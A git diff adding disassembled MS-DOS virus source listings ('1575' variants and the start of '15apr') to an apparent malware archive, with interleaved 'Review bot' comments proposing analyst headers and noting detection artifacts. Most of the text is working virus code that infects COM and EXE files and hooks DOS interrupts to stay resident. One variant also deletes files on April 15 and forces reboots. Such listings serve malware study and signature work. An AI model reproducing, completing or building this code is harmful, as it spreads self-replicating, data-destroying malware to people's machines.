cmp al,bl + je loc_37 ; Jump if equal + pop ds + call sub_17 + push cs + pop ds + retn + +; External Entry into Subroutine + +sub_15: + cmp bl,0Ch + jbe loc_ret_36 ; Jump if below or = + sub bl,0Ch + +loc_ret_36: + retn +loc_37: + pop ax + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + mov dx,offset int_24h_entry + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + cmp byte ptr data_53,43h ; 'C' + jne loc_38 ; Jump if not equal + call sub_4 + jmp short loc_39 + db 90h +loc_38: + call sub_5 +loc_39: + push ds + mov dx,data_40 + mov ax,data_39 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +sub_16 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov al,3 + iret ; Interrupt return +int_24h_entry endp + + +; +; SUBROUTINE +; + +sub_17 proc near +;* mov dx,offset loc_47 ;* + db 0BAh,0B0h, 06h + mov ax,251Ch + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov byte ptr ds:data_56e,90h + nop + mov ax,0B800h + mov es,ax + mov di,data_55e + mov ax,720h + mov cx,0Bh + repne stosw ; Rep zf=0+cx >0 Store ax to es:[di] + push cs + pop es + retn +sub_17 endp + + db 0, 0 +data_48 db 0 +data_49 dw 720h +data_50 db 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 08h,0FEh, 0Eh +data_51 db 0EEh + db 0Ch +data_52 db 90h + db 0FBh, 50h, 51h, 52h, 53h, 55h + db 56h, 57h, 1Eh, 06h, 0Eh, 1Fh + db 0EBh, 0Bh, 90h +loc_40: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + iret ; Interrupt return + db 0B8h, 00h,0B8h, 8Eh,0C0h + db 0BFh,0A0h, 0Fh + db 0BEh, 9Ah, 06h,0B9h, 16h, 00h + db 0F2h,0A4h, 80h, 3Eh,0AEh, 06h + db 0EEh, 74h, 08h,0C6h, 06h,0AEh + db 06h,0EEh,0EBh, 06h, 90h +loc_42: + mov data_51,0F0h +loc_43: + mov ax,es:[di] + mov ah,0Eh + mov data_49,ax + mov data_48,0 + jmp short loc_40 + db 0BFh, 00h, 00h +loc_44: + mov si,offset data_50 
+ push di + mov cx,12h + cld ; Clear direction + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + pop di + jz loc_45 ; Jump if zero + inc di + inc di + cmp di,0FA0h + jne loc_44 ; Jump if not equal + mov di,0 +loc_45: + cmp di,0F9Eh + jne loc_ret_46 ; Jump if not equal + mov data_52,0CFh + +loc_ret_46: + retn +data_53 db 43h + db 0Ch, 0Ah, 45h, 00h,0CBh, 87h + db 0BFh, 1Dh, 25h, 1Eh, 57h, 9Ah + db 83h, 00h,0CBh, 87h,0E8h + db 2Eh + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1575.asm b/MSDOS/Virus.MSDOS.Unknown.1575.asm new file mode 100644 index 00000000..7c94fa06 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1575.asm 
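Review bot: This file is disassembler output rather than source (the `Passes: 5 Analysis Options` banner, the `;*ASM fixup` remarks, and whole instructions emitted as `db` sequences such as `db 0BAh,0B0h, 06h` in `sub_17`), but nothing in the file says so, and a reader should be told at the top that it is an analysis listing. The same header comment should record the behavioral facts that are currently scattered across the hunk: the hard-coded file name `A:MIO.COM` at `data_44`, the `0A0Ch` word read from the last two bytes of a file in `sub_3` and tested by `cmp data_45,0A0Ch` (the already-processed check), the RTC month read through ports 70h/71h in `sub_4`/`sub_5`/`sub_14` that appears to gate the call to `sub_17`, and `sub_17`'s writes to the `0B800h` text-mode segment and to the int 1Ch vector. Each of these is a usable detection artifact, and a sentence each above `start:` is cheaper for the next analyst than re-reading 983 lines.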
@@ -0,0 +1,947 @@ + +PAGE 60,132 + +; +; +; VRES +; +; Created: 4-Jan-92 +; Passes: 5 Analysis Flags on: H +; +; + +data_1e equ 12Bh +data_2e equ 137h +data_3e equ 139h +data_4e equ 13Bh +data_5e equ 27Dh +data_6e equ 5CDh +data_7e equ 724h +data_8e equ 6B0h +data_9e equ 3 +data_10e equ 12h + +seg_a segment + assume cs:seg_a, ds:seg_a + + + org 100h + +vres proc far + +start: + push cs + mov ax,cs +data_11 dw 105h +data_12 dw 5000h +data_13 dw 0B8h +data_14 dw 5001h + db 0CBh, 0 +data_15 dw 0 +data_16 dw 0EB00h + db 4Ah, 90h +data_17 dw 1460h + db 74h, 2, 53h, 0FFh +data_18 dw 0F000h +data_19 dw 3B8h + db 0, 0CDh +data_20 dw 0CD10h +data_21 dw 20h +data_22 dw 20h +data_23 dw 11h +data_24 dw 0FFFFh +data_25 dw 4 +data_26 dw 100h +data_27 dw 674Fh +data_28 dw 100h +data_29 dw 4 +data_30 dw 0 +data_31 dw 0 +data_32 dw 0 +data_33 dw 340h +data_34 db 5 + db 0, 8Ah, 43h, 0B7h, 9Ah, 14h + db 0, 0, 1, 71h, 0Dh, 8Eh + db 0Ch, 56h, 5, 1, 0EAh, 56h + db 74h, 2, 5Ch, 7, 70h, 0 +loc_1: + push ss + add al,al + or bx,[si+7] + jo loc_2 ; Jump if overflow=1 +loc_2: + push es + push ds + mov ax,es + push cs + pop ds + push cs + pop es + mov data_31,ax + mov ax,ss + mov data_26,ax + mov al,2 + out 20h,al ; port 20h, 8259-1 int command + cld ; Clear direction + xor ax,ax ; Zero register + mov ds,ax + xor si,si ; Zero register + mov di,13Ch + mov cx,10h + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + push ds + pop ss + mov bp,8 + xchg bp,sp + call sub_1 ; (01D5) + jmp loc_24 ; (0552) +loc_3: + call sub_12 ; (05EC) + call sub_2 ; (023D) + jz loc_4 ; Jump if zero + mov al,ds:data_7e + push ax + call sub_3 ; (02AE) + pop ax + mov ds:data_7e,al + jmp short loc_5 ; (01B4) + db 90h +loc_4: + call sub_5 ; (041B) + call sub_6 ; (043D) + cmp byte ptr ds:data_7e,0 + jne loc_5 ; Jump if not equal + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_5: + cmp byte ptr ds:data_7e,43h ; 'C' + jne loc_8 ; Jump if not equal +loc_6: + pop ds + pop es + push 
cs + pop ds + pop es + push es + mov di,100h + mov si,10Bh + mov cx,0Ch + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + push es + pop ds + mov ax,100h + push ax + xor ax,ax ; Zero register + retf ; Return far + +vres endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov si,6 + lodsw ; String [si] to ax + cmp ax,192h + je loc_6 ; Jump if equal + cmp ax,179h + jne loc_7 ; Jump if not equal + jmp loc_10 ; (028F) +loc_7: + cmp ax,1DCh + je loc_8 ; Jump if equal + retn +loc_8: + pop ds + pop es + mov bx,cs:data_18 + sub bx,cs:data_29 + mov ax,cs + sub ax,bx + mov ss,ax + mov bp,cs:data_30 + xchg bp,sp + mov bx,cs:data_21 + sub bx,cs:data_22 + mov ax,cs + sub ax,bx + push ax + mov ax,cs:data_23 + push ax + retf ; Return far + db 23h, 1Ah + db '<#/--!.$' + db 0Eh, 23h, 2Fh, 2Dh, 0E0h + db 'D:VRES.COM' + db 0, 58h, 45h, 0, 0 + db 24h, 24h, 24h, 24h, 24h + +; External Entry into Subroutine + +sub_2: + mov ax,3D02h + mov dx,219h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_9 ; Jump if carry=0 + clc ; Clear carry flag + retn +loc_9: + mov ds:data_1e,ax + mov dx,673h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4202h + mov bx,ds:data_1e + mov cx,0FFFFh + mov dx,0FFFEh + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,27Dh + mov ah,3Fh ; '?' 
+ mov bx,ds:data_1e + mov cx,2 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push ds + mov dx,ds:data_3e + mov ax,ds:data_2e + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + cmp word ptr ds:data_5e,0A0Ch + clc ; Clear carry flag + retn + db 0CDh, 20h +loc_10: + cmp ax,22Dh + je loc_11 ; Jump if equal + push ds + pop es + push cs + pop ds + mov ax,data_26 + mov ss,ax + xchg bp,sp + mov si,13Ch + mov di,0 + mov cx,10h + cld ; Clear direction + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + jmp loc_3 ; (018C) +sub_1 endp + + +; +; SUBROUTINE +; + +sub_3 proc near +loc_11: + mov al,43h ; 'C' + mov ds:data_7e,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov ds:data_4e,al + mov dx,219h + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_12 ; Jump if carry=0 + retn +loc_12: + mov ds:data_1e,ax + mov dx,10Bh + mov bx,ds:data_1e + mov cx,0Ch + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + push ax + add ax,10h + and ax,0FFF0h + push ax + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + mov di,31Fh + stosw ; Store ax to es:[di] + pop ax + pop bx + sub ax,bx + mov cx,627h + add cx,ax + mov dx,100h + sub dx,ax + mov bx,ds:data_1e + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov bx,ds:data_1e + mov cx,0Ch + mov dx,31Bh + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,3Eh ; '>' + mov bx,ds:data_1e + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_3 endp + + db 0Eh, 8Ch, 0C8h, 5, 1, 0 + db 50h, 0B8h, 0, 1, 50h, 0CBh + +; +; SUBROUTINE +; + +sub_4 proc near + mov al,45h ; 'E' + mov byte ptr ds:[724h],al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_34,al + mov dx,219h + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_13 ; Jump if carry=0 + retn +loc_13: + mov data_26,ax + mov dx,10Bh + mov bx,data_26 + mov cx,18h + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ax,4202h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + push ax + add ax,10h + adc dx,0 + and ax,0FFF0h + mov data_24,dx + mov data_25,ax + mov cx,727h + sub cx,100h + add ax,cx + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + inc ax + mov data_16,ax + mov data_15,dx + mov ax,data_21 + mov data_22,ax + mov ax,data_20 + mov data_23,ax + mov ax,data_18 + mov data_29,ax + mov ax,data_19 + mov data_30,ax + mov dx,data_24 + mov ax,data_25 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,10h + sub ax,data_17 + mov data_21,ax + mov data_18,ax + mov data_20,100h + mov data_19,100h + mov ax,4200h + xor cx,cx ; Zero register + mov dx,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,10Dh + mov bx,data_26 + mov cx,16h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,100h + mov ax,data_25 + pop cx + sub ax,cx + sub dx,ax + mov cx,727h + add cx,ax + sub cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_4 endp + + db 51h, 0B9h, 0, 0, 0B4h, 4Eh + db 0CDh, 21h, 59h, 0C3h + +; +; SUBROUTINE +; + +sub_5 proc near + push es + mov ax,351Ch + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_13,bx + mov cs:data_14,es + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + push es + pop ax + mov cs:data_12,ax + mov cs:data_11,bx + pop es + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + push ax + push es + push ds + xor ax,ax ; Zero register + mov es,ax + mov si,86h + mov 
ax,es:[si] + mov ds,ax + mov si,725h + cmp word ptr [si],0A0Ch + jne loc_14 ; Jump if not equal + push ds + pop ax + call sub_13 ; (0611) + pop ds + pop es + pop ax + retn +loc_14: + push cs + pop ds + mov ax,data_31 + dec ax + mov es,ax + cmp byte ptr es:[0],5Ah ; 'Z' + je loc_15 ; Jump if equal + jmp short loc_16 ; (04B4) + db 90h +loc_15: + mov ax,es:data_9e + mov cx,737h + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + sub ax,cx + jc loc_16 ; Jump if carry Set + mov es:data_9e,ax + sub es:data_10e,cx + push cs + pop ds + mov ax,es:data_10e + push ax + pop es + mov si,100h + push si + pop di + mov cx,627h + cld ; Clear direction + repne movsb ; Rep while cx>0 Mov [si] to es:[di] + push es + sub ax,ax + mov es,ax + mov si,84h + mov dx,4A8h + mov es:[si],dx + inc si + inc si + pop ax + mov es:[si],ax +loc_16: + pop ds + pop es + pop ax + retn +sub_6 endp + + db 3Ch, 57h, 75h, 3, 0EBh, 1Eh + db 90h, 80h, 0FCh, 1Ah, 75h, 6 + db 0E8h, 17h, 1, 0EBh, 13h, 90h +loc_17: + cmp ah,11h + jne loc_18 ; Jump if not equal + call sub_7 ; (04E1) + iret ; Interrupt return +loc_18: + cmp ah,12h + jne loc_19 ; Jump if not equal + call sub_10 ; (059C) + iret ; Interrupt return +loc_19: + jmp dword ptr cs:data_11 + +; +; SUBROUTINE +; + +sub_7 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + mov byte ptr cs:data_35,0 + nop + call sub_8 ; (0514) + jnz loc_20 ; Jump if not zero + call sub_2 ; (023D) + jz loc_20 ; Jump if zero + call sub_15 ; (065A) + dec byte ptr ds:data_6e +loc_20: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + push cs + pop es + push cs + pop es + cld ; Clear direction + call sub_9 ; (0552) + jnc loc_21 ; Jump 
if carry=0 + cmp di,0 + retn +loc_21: + mov di,219h + mov al,2Eh ; '.' + mov cx,0Bh + repne scasb ; Rept zf=0+cx>0 Scan es:[di] for al + cmp word ptr [di],4F43h + jne loc_22 ; Jump if not equal + cmp byte ptr [di+2],4Dh ; 'M' + jne loc_22 ; Jump if not equal + mov byte ptr ds:[724h],43h ; 'C' + nop + retn +loc_22: + cmp word ptr [di],5845h + jne loc_ret_23 ; Jump if not equal + cmp byte ptr [di+2],45h ; 'E' + jne loc_ret_23 ; Jump if not equal + mov byte ptr ds:[724h],45h ; 'E' + nop + +loc_ret_23: + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near +loc_24: + push ds + mov si,cs:data_27 + mov ax,cs:data_28 + mov ds,ax + mov di,219h + lodsb ; String [si] to al + cmp al,0FFh + jne loc_25 ; Jump if not equal + add si,6 + lodsb ; String [si] to al + jmp short loc_26 ; (0574) + db 90h +loc_25: + cmp al,5 + jb loc_26 ; Jump if below + pop ds + stc ; Set carry flag + retn +loc_26: + mov cx,0Bh + cmp al,0 + je locloop_27 ; Jump if equal + add al,40h ; '@' + stosb ; Store al to es:[di] + mov al,3Ah ; ':' + stosb ; Store al to es:[di] + +locloop_27: + lodsb ; String [si] to al + cmp al,20h ; ' ' + je loc_28 ; Jump if equal + stosb ; Store al to es:[di] + jmp short loc_29 ; (0594) + db 90h +loc_28: + cmp byte ptr es:[di-1],2Eh ; '.' + je loc_29 ; Jump if equal + mov al,2Eh ; '.' 
+ stosb ; Store al to es:[di] +loc_29: + loop locloop_27 ; Loop if cx > 0 + + mov al,0 + stosb ; Store al to es:[di] + pop ds + clc ; Clear carry flag + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + cmp byte ptr cs:data_35,0 + je loc_30 ; Jump if equal + jmp short loc_31 ; (05D3) + db 90h +loc_30: + call sub_8 ; (0514) + jnz loc_31 ; Jump if not zero + call sub_2 ; (023D) + jz loc_31 ; Jump if zero + call sub_15 ; (065A) + dec byte ptr ds:data_6e + pop es + pop ds + pop di + pop si +data_35 db 5Dh + db 5Bh, 5Ah, 59h, 58h, 0C3h +loc_31: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_10 endp + + db 0 + +; +; SUBROUTINE +; + +sub_11 proc near + push ax + push ds + pop ax + mov cs:data_28,ax + mov cs:data_27,dx + pop ax + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_12 proc near + push cs + mov al,0 + out 20h,al ; port 20h, 8259-1 int command + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov ds:data_3e,bx + mov bx,es + mov ds:data_2e,bx + pop es + mov si,20Ah + mov di,219h + mov cx,0Fh + +locloop_32: + lodsb ; String [si] to al + add al,20h ; ' ' + stosb ; Store al to es:[di] + loop locloop_32 ; Loop if cx > 0 + + retn +sub_12 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + push ax + push cs + pop ds + push cs + pop es + mov bl,data_34 + cmp bl,0Ch + ja loc_34 ; Jump if above + cmp bl,0 + je loc_34 ; Jump if equal + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + cmp al,0Ch + ja loc_34 ; Jump if above + cmp al,0 + je loc_34 ; Jump if equal + cmp al,bl + je loc_34 ; Jump if equal + inc bl + call sub_14 ; (064F) + cmp al,bl + je loc_34 ; Jump if equal + inc bl + 
call sub_14 ; (064F) + cmp al,bl + je loc_34 ; Jump if equal + pop ds + call sub_16 ; (0686) + push cs + pop ds + retn + +; External Entry into Subroutine + +sub_14: + cmp bl,0Ch + jbe loc_ret_33 ; Jump if below or = + sub bl,0Ch + +loc_ret_33: + retn +loc_34: + pop ax + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + mov dx,673h + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + cmp byte ptr ds:[724h],43h ; 'C' + jne loc_35 ; Jump if not equal + call sub_3 ; (02AE) + jmp short loc_36 ; (0672) + db 90h +loc_35: + call sub_4 ; (0337) +loc_36: + push ds +sub_15 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov dx,data_33 + mov ax,data_32 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +int_24h_entry endp + + db 0B0h, 3, 0CFh + +; +; SUBROUTINE +; + +sub_16 proc near + mov dx,6B0h + mov ax,251Ch + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov byte ptr ds:data_8e,90h + nop + mov ax,0B800h + mov es,ax +data_36 db 0BFh +data_37 dw 0FA0h + db 0B8h, 20h, 7, 0B9h, 0Bh, 0 + db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0 + db 0, 0, 20h, 7, 0Fh + db 0Ah +data_38 db 0Fh + db 0Ah +data_39 db 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h + db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h + db 51h, 52h, 53h, 55h, 56h, 57h + db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh + db 90h +loc_37: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + iret ; Interrupt return +sub_16 endp + + db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h + db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h + db 16h, 0, 0F2h, 0A4h, 80h, 3Eh + db 0AEh, 6, 0EEh, 74h, 8, 0C6h + db 6, 0AEh, 6, 0EEh, 0EBh, 6 + db 90h +loc_38: + mov data_38,0F0h +loc_39: + mov ax,es:[di] + mov ah,0Eh + mov data_37,ax + mov data_36,0 + jmp short loc_37 ; (06D0) + +; +; SUBROUTINE +; + +sub_17 proc near + mov di,0 +loc_40: + mov si,69Ch + push di + mov cx,12h + cld ; Clear 
direction + repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di] + pop di + jz loc_41 ; Jump if zero + inc di + inc di + cmp di,0FA0h + jne loc_40 ; Jump if not equal + mov di,0 +loc_41: + cmp di,0F9Eh + jne loc_ret_42 ; Jump if not equal + mov data_39,0CFh + +loc_ret_42: + retn +sub_17 endp + + db 43h, 0Ch, 0Ah + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.15apr.asm b/MSDOS/Virus.MSDOS.Unknown.15apr.asm new file mode 100644 index 00000000..79ec33c0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.15apr.asm 
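Review bot: The `proc` boundaries in this listing do not follow the control flow: `sub_15` ends at `push ds`, its remaining instructions (`mov dx,data_33` through `pop ds / retn`) are enclosed in `int_24h_entry proc far`, and the actual handler bytes `db 0B0h, 3, 0CFh` (`mov al,3 / iret`) sit unlabelled after `int_24h_entry endp`. The sibling Virus.MSDOS.Unknown.1575-e.asm in this same commit has the coherent layout (`sub_16` runs through the vector restore and `int_24h_entry` is `mov al,3 / iret`), so a comment above `sub_15` noting this and cross-referencing the two files as the same family with different target names (`D:VRES.COM` here, `A:MIO.COM` there) would stop a reader from taking `int_24h_entry` here as the critical-error handler. The same applies to `data_35 db 5Dh` followed by `db 5Bh, 5Ah, 59h, 58h, 0C3h` inside `sub_10`, which appear to be the `pop bp … pop ax / retn` epilogue that `sub_7` overwrites via `mov byte ptr cs:data_35,0`; if that reading is right, a one-line comment saying the listing treats live code as data there would help.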
@@ -0,0 +1,679 @@
+
+PAGE 60,132
+
+;
+;
+; 15APR
+;
+; Created: 4-Mar-91
+;
+;
+
+data_1e equ 4Ch ; (0000:004C=31h)
+data_2e equ 4Eh ; (0000:004E=70h)
+data_3e equ 84h ; (0000:0084=0E3h)
+data_4e equ 86h ; (0000:0086=161Ah)
+data_5e equ 90h ; (0000:0090=8Eh)
+data_6e equ 92h ; (0000:0092=1498h)
+data_7e equ 102h ; (0000:0102=0CC00h)
+data_8e equ 106h ; (0000:0106=326h)
+data_9e equ 47Bh ; (0000:047B=0)
+data_10e equ 0 ; (0326:0000=6A7h)
+data_11e equ 2 ; (0326:0002=70h)
+data_12e equ 0 ; (0691:0000=0C9h)
+data_13e equ 1 ; (0692:0001=0D217h)
+data_14e equ 2 ; (06E3:0002=2342h)
+data_15e equ 6 ; (06E3:0006=2344h)
+data_32e equ 0FC99h ; (701E:FC99=0)
+data_33e equ 0FC9Bh ; (701E:FC9B=0)
+data_34e equ 0FCB7h ; (701E:FCB7=0)
+data_35e equ 0FCB9h ; (701E:FCB9=0)
+data_36e equ 0FCBBh ; (701E:FCBB=0)
+data_37e equ 0FCC5h ; (701E:FCC5=0)
+data_38e equ 0FCC7h ; (701E:FCC7=0)
+data_39e equ 0FCCDh ; (701E:FCCD=0)
+data_40e equ 0FCCFh ; (701E:FCCF=0)
+
+code_seg_a segment
+ assume cs:code_seg_a, ds:code_seg_a
+
+
+ org 100h
+
+b15apr proc far
+
+start:
+data_16 dw 63E9h
+data_17 dw 0C303h
+ db 23 dup (0C3h)
+ db 2Ah, 2Eh, 45h, 58h, 45h, 0
+data_19 dw 0C3C3h
+data_20 dw 0C3C3h
+data_21 dw 0
+data_22 dw 0
+data_23 dw 0
+data_24 dw 0
+data_25 dw 0
+data_26 dd 00000h
+data_27 dw 0
+data_28 dw 0
+data_29 dd 00000h
+data_30 dw 0
+data_31 dw 0
+ db 0Ah, 0Dh, 0Ah, 0Dh, ' Bhaktivedan'
+ db 'ta Swami Prabhupada (1896-1977)', 0Ah
+ db 0Dh, 0Ah, 0Dh, '$=MKu', 9, 'U'
+ db 8Bh, 0ECh, 83h, 66h, 6, 0FEh
+ db 5Dh, 0CFh, 80h, 0FCh, 4Bh, 74h
+ db 12h, 3Dh, 0, 3Dh, 74h, 0Dh
+ db 3Dh, 0, 6Ch, 75h, 5, 80h
+ db 0FBh, 0, 74h, 3
+loc_1:
+ jmp loc_15
+loc_2:
+ push es
+ push ds
+ push di
+ push si
+ push bp
+ push dx
+ push cx
+ push bx
+ push ax
+ call sub_6
+ call sub_7
+ cmp ax,6C00h
+ jne loc_3 ; Jump if not equal
+ mov dx,si
+loc_3:
+ mov cx,80h
+ mov si,dx
+
+locloop_4:
+ inc si
+ mov al,[si]
+ or al,al ; Zero ?
+ loopnz locloop_4 ; Loop if zf=0, cx>0 + + sub si,2 + cmp word ptr [si],4D4Fh + je loc_7 ; Jump if equal + cmp word ptr [si],4558h + je loc_6 ; Jump if equal +loc_5: + jmp short loc_14 + db 90h +loc_6: + cmp word ptr [si-4],4E41h + je loc_8 ; Jump if equal + cmp word ptr [si-4],444Ch + je loc_8 ; Jump if equal + cmp word ptr [si-4],4A52h + je loc_8 ; Jump if equal + jnz loc_9 ; Jump if not zero +loc_7: + cmp word ptr [si-4],444Eh + je loc_5 ; Jump if equal + jnz loc_10 ; Jump if not zero +loc_8: + int 19h ; Bootstrap loader +loc_9: + jz loc_10 ; Jump if zero +loc_10: + mov ax,3D02h + call sub_5 + jc loc_14 ; Jump if carry Set + mov bx,ax + mov ax,5700h + call sub_5 + mov cs:data_22,cx ; (701E:0127=0) + mov cs:data_23,dx ; (701E:0129=0) + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + push cs + pop ds + mov dx,103h + mov si,dx + mov cx,18h + mov ah,3Fh ; '?' + call sub_5 + jc loc_12 ; Jump if carry Set + cmp word ptr [si],5A4Dh + jne loc_11 ; Jump if not equal + call sub_1 + jmp short loc_12 +loc_11: + call sub_4 +loc_12: + jc loc_13 ; Jump if carry Set + mov ax,5701h + mov cx,cs:data_22 ; (701E:0127=0) + mov dx,cs:data_23 ; (701E:0129=0) + call sub_5 +loc_13: + mov ah,3Eh ; '>' + call sub_5 +loc_14: + call sub_7 + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es +loc_15: + jmp cs:data_26 ; (701E:012F=0) + +b15apr endp + +; +; SUBROUTINE +; + +sub_1 proc near + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dh,4 + je loc_16 ; Jump if equal + jnz loc_17 ; Jump if not zero +loc_16: + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp dl,0Fh + je loc_18 ; Jump if equal + jnz loc_17 ; Jump if not zero +loc_17: + mov cx,[si+16h] + add cx,[si+8] + mov ax,10h + mul cx ; dx:ax = reg * ax + add ax,[si+14h] + adc dx,0 + push dx + push ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + 
call sub_5 + cmp dx,0 + jne loc_19 ; Jump if not equal + cmp ax,4E2h + jae loc_19 ; Jump if above or = + pop ax + pop dx + stc ; Set carry flag + ret +loc_18: + mov dx,10h + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,11Bh + mov cx,110Bh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + mov dx,2Eh + mov ax,3D02h + int 15h ; General services, ah=func 3Dh + mov ah,41h ; 'A' + int 21h ; DOS Services ah=function 41h + ; delete file, name @ ds:dx + jmp loc_25 + db 0BAh, 3Fh, 1, 0B4h, 9, 0CDh + db 21h, 0EBh, 1, 90h +loc_19: + mov di,ax + mov bp,dx + pop cx + sub ax,cx + pop cx + sbb dx,cx + cmp word ptr [si+0Ch],0 + je loc_ret_22 ; Jump if equal + cmp dx,0 + jne loc_20 ; Jump if not equal + cmp ax,4E2h + jne loc_20 ; Jump if not equal + stc ; Set carry flag + ret +loc_20: 